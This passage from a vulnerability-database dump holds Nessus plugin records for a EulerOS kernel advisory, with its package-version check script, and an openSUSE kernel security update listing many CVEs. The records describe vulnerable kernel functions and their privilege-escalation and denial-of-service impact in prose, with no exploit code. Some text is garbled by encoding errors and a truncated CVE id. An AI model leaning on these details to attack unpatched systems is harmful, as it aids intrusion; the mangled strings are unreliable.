crash.(CVE-2015-8845i1/4%0\n\n - fs/namespace.c in the Linux kernel through 3.16.1 does\n not properly restrict clearing MNT_NODEV, MNT_NOSUID,\n and MNT_NOEXEC and changing MNT_ATIME_MASK during a\n remount of a bind mount, which allows local users to\n gain privileges, interfere with backups and auditing on\n systems that had atime enabled, or cause a denial of\n service (excessive filesystem updating) on systems that\n had atime disabled via a 'mount -o remount' command\n within a user namespace.(CVE-2014-5207i1/4%0\n\n - The NFS2/3 RPC client could send long arguments to the\n NFS server. These encoded arguments are stored in an\n array of memory pages, and accessed using pointer\n variables. Arbitrarily long arguments could make these\n pointers point outside the array and cause an\n out-of-bounds memory access. A remote user or program\n could use this flaw to crash the kernel, resulting in\n denial of service.(CVE-2017-7645i1/4%0\n\n - The time subsystem in the Linux kernel, when\n CONFIG_TIMER_STATS is enabled, allows local users to\n discover real PID values (as distinguished from PID\n values inside a PID namespace) by reading the\n /proc/timer_list file, related to the print_timer\n function in kernel/time/timer_list.c and the\n __timer_stats_timer_set_start_info function in\n kernel/time/timer.c.(CVE-2017-5967i1/4%0\n\n - A vulnerability was found in the Linux kernel where the\n keyctl_set_reqkey_keyring() function leaks the thread\n keyring. This allows an unprivileged local user to\n exhaust kernel memory and thus cause a\n DoS.(CVE-2017-7472i1/4%0\n\n - A flaw was found that can be triggered in\n keyring_search_iterator in keyring.c if type-i1/4zmatch\n is NULL. A local user could use this flaw to crash the\n system or, potentially, escalate their\n privileges.(CVE-2017-2647i1/4%0\n\n - The make_response function in\n drivers/block/xen-blkback/blkback.c in the Linux kernel\n before 4.11.8 allows guest OS users to obtain sensitive\n information from host OS (or other guest OS) kernel\n memory by leveraging the copying of uninitialized\n padding fields in Xen block-interface response\n structures, aka XSA-216.(CVE-2017-10911i1/4%0\n\n - Stack-based buffer overflow in the SET_WPS_IE IOCTL\n implementation in wlan_hdd_hostapd.c in the WLAN (aka\n Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used\n in Qualcomm Innovation Center (QuIC) Android\n contributions for MSM devices and other products,\n allows attackers to gain privileges via a crafted\n application that uses a long WPS IE\n element.(CVE-2015-0570i1/4%0\n\n - The net_ctl_permissions function in net/sysctl_net.c in\n the Linux kernel before 3.11.5 does not properly\n determine uid and gid values, which allows local users\n to bypass intended /proc/sys/net restrictions via a\n crafted application.(CVE-2013-4270i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 11, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1478)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7472", "CVE-2016-5828", "CVE-2017-7645", "CVE-2017-5967", "CVE-2013-4270", "CVE-2017-16537", "CVE-2016-2544", "CVE-2015-0570", "CVE-2016-4558", "CVE-2017-10911", "CVE-2017-16647", "CVE-2015-5697", "CVE-2017-16643", "CVE-2017-2647", "CVE-2018-12233", "CVE-2014-5207", "CVE-2016-6130", "CVE-2015-8845", "CVE-2013-4299", "CVE-2018-15572"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1478.NASL", "href": "https://www.tenable.com/plugins/nessus/124802", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124802);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-4270\",\n \"CVE-2013-4299\",\n \"CVE-2014-5207\",\n \"CVE-2015-0570\",\n \"CVE-2015-5697\",\n \"CVE-2015-8845\",\n \"CVE-2016-2544\",\n \"CVE-2016-4558\",\n \"CVE-2016-5828\",\n \"CVE-2016-6130\",\n \"CVE-2017-10911\",\n \"CVE-2017-16537\",\n \"CVE-2017-16643\",\n \"CVE-2017-16647\",\n \"CVE-2017-2647\",\n \"CVE-2017-5967\",\n \"CVE-2017-7472\",\n \"CVE-2017-7645\",\n \"CVE-2018-12233\",\n \"CVE-2018-15572\"\n );\n script_bugtraq_id(\n 63183,\n 64471,\n 69216\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1478)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - In the ea_get function in fs/jfs/xattr.c in the Linux\n kernel through 4.17.1, a memory corruption bug in JFS\n can be triggered by calling setxattr twice with two\n different extended attribute names on the same file.\n This vulnerability can be triggered by an unprivileged\n user with the ability to create files and execute\n programs. A kmalloc call is incorrect, leading to\n slab-out-of-bounds in jfs_xattr.(CVE-2018-12233i1/4%0\n\n - The spectre_v2_select_mitigation function in\n arch/x86/kernel/cpu/bugs.c in the Linux kernel before\n 4.18.1 does not always fill RSB upon a context switch,\n which makes it easier for attackers to conduct\n userspace-userspace spectreRSB\n attacks.(CVE-2018-15572i1/4%0\n\n - Race condition in the queue_delete function in\n sound/core/seq/seq_queue.c in the Linux kernel before\n 4.4.1 allows local users to cause a denial of service\n (use-after-free and system crash) by making an ioctl\n call at a certain time.(CVE-2016-2544i1/4%0\n\n - A flaw was found in the Linux kernel's implementation\n of BPF in which systems can application can overflow a\n 32 bit refcount in both program and map refcount. This\n refcount can wrap and end up a user after\n free.(CVE-2016-4558i1/4%0\n\n - Interpretation conflict in\n drivers/md/dm-snap-persistent.c in the Linux kernel\n through 3.11.6 allows remote authenticated users to\n obtain sensitive information or modify data via a\n crafted mapping to a snapshot block\n device.(CVE-2013-4299i1/4%0\n\n - The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel through 4.13.11 allows local users to\n cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16537i1/4%0\n\n - A vulnerability in the handling of Transactional Memory\n on powerpc systems was found. An unprivileged local\n user can crash the kernel by starting a transaction,\n suspending it, and then calling any of the exec() class\n system calls.(CVE-2016-5828i1/4%0\n\n - A cross-boundary flaw was discovered in the Linux\n kernel software raid driver. The driver accessed a\n disabled bitmap where only the first byte of the buffer\n was initialized to zero. This meant that the rest of\n the request (up to 4095 bytes) was left and copied into\n user space. An attacker could use this flaw to read\n private information from user space that would not\n otherwise have been accessible.(CVE-2015-5697i1/4%0\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643i1/4%0\n\n - Race condition in the sclp_ctl_ioctl_sccb function in\n drivers/s390/char/sclp_ctl.c in the Linux kernel before\n 4.6 allows local users to obtain sensitive information\n from kernel memory by changing a certain length value,\n aka a 'double fetch' vulnerability.(CVE-2016-6130i1/4%0\n\n - drivers/net/usb/asix_devices.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (NULL pointer dereference and system crash) or\n possibly have unspecified other impact via a crafted\n USB device.(CVE-2017-16647i1/4%0\n\n - A flaw was found in the Linux kernel which could cause\n a kernel panic when restoring machine specific\n registers on the PowerPC platform. Incorrect\n transactional memory state registers could\n inadvertently change the call path on return from\n userspace and cause the kernel to enter an unknown\n state and crash.(CVE-2015-8845i1/4%0\n\n - fs/namespace.c in the Linux kernel through 3.16.1 does\n not properly restrict clearing MNT_NODEV, MNT_NOSUID,\n and MNT_NOEXEC and changing MNT_ATIME_MASK during a\n remount of a bind mount, which allows local users to\n gain privileges, interfere with backups and auditing on\n systems that had atime enabled, or cause a denial of\n service (excessive filesystem updating) on systems that\n had atime disabled via a 'mount -o remount' command\n within a user namespace.(CVE-2014-5207i1/4%0\n\n - The NFS2/3 RPC client could send long arguments to the\n NFS server. These encoded arguments are stored in an\n array of memory pages, and accessed using pointer\n variables. Arbitrarily long arguments could make these\n pointers point outside the array and cause an\n out-of-bounds memory access. A remote user or program\n could use this flaw to crash the kernel, resulting in\n denial of service.(CVE-2017-7645i1/4%0\n\n - The time subsystem in the Linux kernel, when\n CONFIG_TIMER_STATS is enabled, allows local users to\n discover real PID values (as distinguished from PID\n values inside a PID namespace) by reading the\n /proc/timer_list file, related to the print_timer\n function in kernel/time/timer_list.c and the\n __timer_stats_timer_set_start_info function in\n kernel/time/timer.c.(CVE-2017-5967i1/4%0\n\n - A vulnerability was found in the Linux kernel where the\n keyctl_set_reqkey_keyring() function leaks the thread\n keyring. This allows an unprivileged local user to\n exhaust kernel memory and thus cause a\n DoS.(CVE-2017-7472i1/4%0\n\n - A flaw was found that can be triggered in\n keyring_search_iterator in keyring.c if type-i1/4zmatch\n is NULL. A local user could use this flaw to crash the\n system or, potentially, escalate their\n privileges.(CVE-2017-2647i1/4%0\n\n - The make_response function in\n drivers/block/xen-blkback/blkback.c in the Linux kernel\n before 4.11.8 allows guest OS users to obtain sensitive\n information from host OS (or other guest OS) kernel\n memory by leveraging the copying of uninitialized\n padding fields in Xen block-interface response\n structures, aka XSA-216.(CVE-2017-10911i1/4%0\n\n - Stack-based buffer overflow in the SET_WPS_IE IOCTL\n implementation in wlan_hdd_hostapd.c in the WLAN (aka\n Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used\n in Qualcomm Innovation Center (QuIC) Android\n contributions for MSM devices and other products,\n allows attackers to gain privileges via a crafted\n application that uses a long WPS IE\n element.(CVE-2015-0570i1/4%0\n\n - The net_ctl_permissions function in net/sysctl_net.c in\n the Linux kernel before 3.11.5 does not properly\n determine uid and gid values, which allows local users\n to bypass intended /proc/sys/net restrictions via a\n crafted application.(CVE-2013-4270i1/4%0\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1478\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9f1ad85b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:28:08", "description": "The openSUSE 13.1 kernel was updated to fix security issues and bugs :\n\nSecurity issues fixed: CVE-2014-9322: A local privilege escalation in\nthe x86_64 32bit compatibility signal handling was fixed, which could\nbe used by local attackers to crash the machine or execute code.\n\nCVE-2014-9090: The do_double_fault function in arch/x86/kernel/traps.c\nin the Linux kernel did not properly handle faults associated with the\nStack Segment (SS) segment register, which allowed local users to\ncause a denial of service (panic) via a modify_ldt system call, as\ndemonstrated by sigreturn_32 in the linux-clock-tests test suite.\n\nCVE-2014-8133: Insufficient validation of TLS register usage could\nleak information from the kernel stack to userspace.\n\nCVE-2014-0181: The Netlink implementation in the Linux kernel through\n3.14.1 did not provide a mechanism for authorizing socket operations\nbased on the opener of a socket, which allowed local users to bypass\nintended access restrictions and modify network configurations by\nusing a Netlink socket for the (1) stdout or (2) stderr of a setuid\nprogram. (bsc#875051)\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-3688: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (memory consumption) by\ntriggering a large number of chunks in an association's output queue,\nas demonstrated by ASCONF probes, related to net/sctp/inqueue.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3687: The sctp_assoc_lookup_asconf_ack function in\nnet/sctp/associola.c in the SCTP implementation in the Linux kernel\nallowed remote attackers to cause a denial of service (panic) via\nduplicate ASCONF chunks that trigger an incorrect uncork within the\nside-effect interpreter.\n\nCVE-2014-7975: The do_umount function in fs/namespace.c in the Linux\nkernel did not require the CAP_SYS_ADMIN capability for do_remount_sb\ncalls that change the root filesystem to read-only, which allowed\nlocal users to cause a denial of service (loss of writability) by\nmaking certain unshare system calls, clearing the / MNT_LOCKED flag,\nand making an MNT_FORCE umount system call.\n\nCVE-2014-8884: Stack-based buffer overflow in the\nttusbdecfe_dvbs_diseqc_send_master_cmd function in\ndrivers/media/usb/ttusb-dec/ttusbdecfe.c in the Linux kernel allowed\nlocal users to cause a denial of service (system crash) or possibly\ngain privileges via a large message length in an ioctl call.\n\nCVE-2014-3673: The SCTP implementation in the Linux kernel allowed\nremote attackers to cause a denial of service (system crash) via a\nmalformed ASCONF chunk, related to net/sctp/sm_make_chunk.c and\nnet/sctp/sm_statefuns.c.\n\nCVE-2014-3186: Buffer overflow in the picolcd_raw_event function in\ndevices/hid/hid-picolcd_core.c in the PicoLCD HID device driver in the\nLinux kernel, as used in Android on Nexus 7 devices, allowed\nphysically proximate attackers to cause a denial of service (system\ncrash) or possibly execute arbitrary code via a crafted device that\nsends a large report.\n\nCVE-2014-7841: The sctp_process_param function in\nnet/sctp/sm_make_chunk.c in the SCTP implementation in the Linux\nkernel, when ASCONF is used, allowed remote attackers to cause a\ndenial of service (NULL pointer dereference and system crash) via a\nmalformed INIT chunk.\n\nCVE-2014-4611: Integer overflow in the LZ4 algorithm implementation,\nas used in Yann Collet LZ4 before r118 and in the lz4_uncompress\nfunction in lib/lz4/lz4_decompress.c in the Linux kernel before\n3.15.2, on 32-bit platforms might allow context-dependent attackers to\ncause a denial of service (memory corruption) or possibly have\nunspecified other impact via a crafted Literal Run that would be\nimproperly handled by programs not complying with an API limitation, a\ndifferent vulnerability than CVE-2014-4715.\n\nCVE-2014-4608: Multiple integer overflows in the lzo1x_decompress_safe\nfunction in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in\nthe Linux kernel allowed context-dependent attackers to cause a denial\nof service (memory corruption) via a crafted Literal Run.\n\nCVE-2014-8709: The ieee80211_fragment function in net/mac80211/tx.c in\nthe Linux kernel did not properly maintain a certain tail pointer,\nwhich allowed remote attackers to obtain sensitive cleartext\ninformation by reading packets.\n\nCVE-2014-3185: Multiple buffer overflows in the\ncommand_port_read_callback function in drivers/usb/serial/whiteheat.c\nin the Whiteheat USB Serial Driver in the Linux kernel allowed\nphysically proximate attackers to execute arbitrary code or cause a\ndenial of service (memory corruption and system crash) via a crafted\ndevice that provides a large amount of (1) EHCI or (2) XHCI data\nassociated with a bulk response.\n\nCVE-2014-3184: The report_fixup functions in the HID subsystem in the\nLinux kernel might have allowed physically proximate attackers to\ncause a denial of service (out-of-bounds write) via a crafted device\nthat provides a small report descriptor, related to (1)\ndrivers/hid/hid-cherry.c, (2) drivers/hid/hid-kye.c, (3)\ndrivers/hid/hid-lg.c, (4) drivers/hid/hid-monterey.c, (5)\ndrivers/hid/hid-petalynx.c, and (6) drivers/hid/hid-sunplus.c.\n\nCVE-2014-3182: Array index error in the logi_dj_raw_event function in\ndrivers/hid/hid-logitech-dj.c in the Linux kernel allowed physically\nproximate attackers to execute arbitrary code or cause a denial of\nservice (invalid kfree) via a crafted device that provides a malformed\nREPORT_TYPE_NOTIF_DEVICE_UNPAIRED value.\n\nCVE-2014-3181: Multiple stack-based buffer overflows in the\nmagicmouse_raw_event function in drivers/hid/hid-magicmouse.c in the\nMagic Mouse HID driver in the Linux kernel allowed physically\nproximate attackers to cause a denial of service (system crash) or\npossibly execute arbitrary code via a crafted device that provides a\nlarge amount of (1) EHCI or (2) XHCI data associated with an event.\n\nCVE-2014-7826: kernel/trace/trace_syscalls.c in the Linux kernel did\nnot properly handle private syscall numbers during use of the ftrace\nsubsystem, which allowed local users to gain privileges or cause a\ndenial of service (invalid pointer dereference) via a crafted\napplication.\n\nCVE-2013-7263: The Linux kernel updated certain length values before\nensuring that associated data structures have been initialized, which\nallowed local users to obtain sensitive information from kernel stack\nmemory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call,\nrelated to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c,\nnet/ipv6/raw.c, and net/ipv6/udp.c. This update fixes the leak of the\nport number when using ipv6 sockets. (bsc#853040).\n\nCVE-2013-2898: Fixed potential kernel caller confusion via\npast-end-of-heap-allocation read in sensor-hub HID driver.\n\nCVE-2013-2891: Fixed 16 byte past-end-of-heap-alloc zeroing in\nsteelseries HID driver.\n\nVE-2014-6410: The __udf_read_inode function in fs/udf/inode.c in the\nLinux kernel did not restrict the amount of ICB indirection, which\nallowed physically proximate attackers to cause a denial of service\n(infinite loop or stack consumption) via a UDF filesystem with a\ncrafted inode.\n\nCVE-2014-5471: Stack consumption vulnerability in the\nparse_rock_ridge_inode_internal function in fs/isofs/rock.c in the\nLinux kernel allowed local users to cause a denial of service\n(uncontrolled recursion, and system crash or reboot) via a crafted\niso9660 image with a CL entry referring to a directory entry that has\na CL entry.\n\nCVE-2014-5472: The parse_rock_ridge_inode_internal function in\nfs/isofs/rock.c in the Linux kernel allowed local users to cause a\ndenial of service (unkillable mount process) via a crafted iso9660\nimage with a self-referential CL entry.\n\nCVE-2014-0206: Array index error in the aio_read_events_ring function\nin fs/aio.c in the Linux kernel allowed local users to obtain\nsensitive information from kernel memory via a large head value.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5206: The do_remount function in fs/namespace.c in the Linux\nkernel did not maintain the MNT_LOCK_READONLY bit across a remount of\na bind mount, which allowed local users to bypass an intended\nread-only restriction and defeat certain sandbox protection mechanisms\nvia a 'mount -o remount' command within a user namespace.\n\nCVE-2014-5207: fs/namespace.c in the Linux kernel did not properly\nrestrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing\nMNT_ATIME_MASK during a remount of a bind mount, which allowed local\nusers to gain privileges, interfere with backups and auditing on\nsystems that had atime enabled, or cause a denial of service\n(excessive filesystem updating) on systems that had atime disabled via\na 'mount -o remount' command within a user namespace.\n\nCVE-2014-1739: The media_device_enum_entities function in\ndrivers/media/media-device.c in the Linux kernel did not initialize a\ncertain data structure, which allowed local users to obtain sensitive\ninformation from kernel memory by leveraging /dev/media0 read access\nfor a MEDIA_IOC_ENUM_ENTITIES ioctl call.\n\nCVE-2014-4943: The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the\nLinux kernel allowed local users to gain privileges by leveraging\ndata-structure differences between an l2tp socket and an inet socket.\n\nCVE-2014-4508: arch/x86/kernel/entry_32.S in the Linux kernel on\n32-bit x86 platforms, when syscall auditing is enabled and the sep CPU\nfeature flag is set, allowed local users to cause a denial of service\n(OOPS and system crash) via an invalid syscall number, as demonstrated\nby number 1000.\n\nCVE-2014-5077: The sctp_assoc_update function in net/sctp/associola.c\nin the Linux kernel, when SCTP authentication is enabled, allowed\nremote attackers to cause a denial of service (NULL pointer\ndereference and OOPS) by starting to establish an association between\ntwo endpoints immediately after an exchange of INIT and INIT ACK\nchunks to establish an earlier association between these endpoints in\nthe opposite direction.\n\nCVE-2014-4171: mm/shmem.c in the Linux kernel did not properly\nimplement the interaction between range notification and hole\npunching, which allowed local users to cause a denial of service\n(i_mutex hold) by using the mmap system call to access a hole, as\ndemonstrated by interfering with intended shmem activity by blocking\ncompletion of (1) an MADV_REMOVE madvise call or (2) an\nFALLOC_FL_PUNCH_HOLE fallocate call.\n\nAlso the following bugs were fixed :\n\n - KEYS: Fix stale key registration at error path\n (bnc#908163).\n\n - parport: parport_pc, do not remove parent devices early\n (bnc#856659).\n\n - xfs: fix directory hash ordering bug.\n\n - xfs: mark all internal workqueues as freezable\n (bnc#899785).\n\n - [media] uvc: Fix destruction order in uvc_delete()\n (bnc#897736).\n\n - cfq-iosched: Fix wrong children_weight calculation\n (bnc#893429).\n\n - target/rd: Refactor rd_build_device_space +\n rd_release_device_space (bnc#882639).\n\n - Btrfs: Fix memory corruption by ulist_add_merge() on\n 32bit arch (bnc#887046).\n\n - usb: pci-quirks: Prevent Sony VAIO t-series from\n switching usb ports (bnc#864375).\n\n - xhci: Switch only Intel Lynx Point-LP ports to EHCI on\n shutdown (bnc#864375).\n\n - xhci: Switch Intel Lynx Point ports to EHCI on shutdown\n (bnc#864375).\n\n - ALSA: hda - Fix broken PM due to incomplete i915\n initialization (bnc#890114).\n\n - netbk: Don't destroy the netdev until the vif is shut\n down (bnc#881008).\n\n - swiotlb: don't assume PA 0 is invalid (bnc#865882).\n\n - PM / sleep: Fix request_firmware() error at resume\n (bnc#873790).\n\n - usbcore: don't log on consecutive debounce failures of\n the same port (bnc#818966).", "edition": 19, "published": "2014-12-22T00:00:00", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-SU-2014:1677-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-5077", "CVE-2014-3182", "CVE-2013-2898", "CVE-2014-3186", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-9090", "CVE-2014-3688", "CVE-2014-7841", "CVE-2013-2891", "CVE-2014-4508", "CVE-2014-4943", "CVE-2014-9322", "CVE-2014-0206", "CVE-2014-3181", "CVE-2014-8709", "CVE-2014-4171", "CVE-2014-5472", "CVE-2014-7975", "CVE-2014-3185", "CVE-2014-5206", "CVE-2014-4715", "CVE-2014-8884", "CVE-2014-4608", "CVE-2014-4611", "CVE-2013-7263", "CVE-2014-0181", "CVE-2014-5207", "CVE-2014-6410", "CVE-2014-5471", "CVE-2014-8133", "CVE-2014-7826", "CVE-2014-3184", "CVE-2014-3687"], "modified": "2014-12-22T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:hdjmod-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:hdjmod-kmp-default", "p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:ipset-kmp-pae", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-tools", "p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen-debuginfo", "p-cpe:/a:novell:opensuse:crash-eppic", "p-cpe:/a:novell:opensuse:kernel-pae-debuginfo", "p-cpe:/a:novell:opensuse:iscsitarget-kmp-xen", "p-cpe:/a:novell:opensuse:vhba-kmp-debugsource", "p-cpe:/a:novell:opensuse:pcfclock-debuginfo", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo", "p-cpe:/a:novell:opensuse:vhba-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-ec2-base", "p-cpe:/a:novell:opensuse:ipset-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:hdjmod-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-kmp-pae", "p-cpe:/a:novell:opensuse:virtualbox-host-kmp-desktop", "p-cpe:/a:novell:opensuse:virtualbox-qt", "p-cpe:/a:novell:opensuse:kernel-ec2", "p-cpe:/a:novell:opensuse:hdjmod-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo", "p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-pae-debugsource", "p-cpe:/a:novell:opensuse:cloop-kmp-xen", "p-cpe:/a:novell:opensuse:virtualbox-debugsource", "p-cpe:/a:novell:opensuse:ndiswrapper-debuginfo", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-default", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:xtables-addons-kmp-xen", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:python-virtualbox", 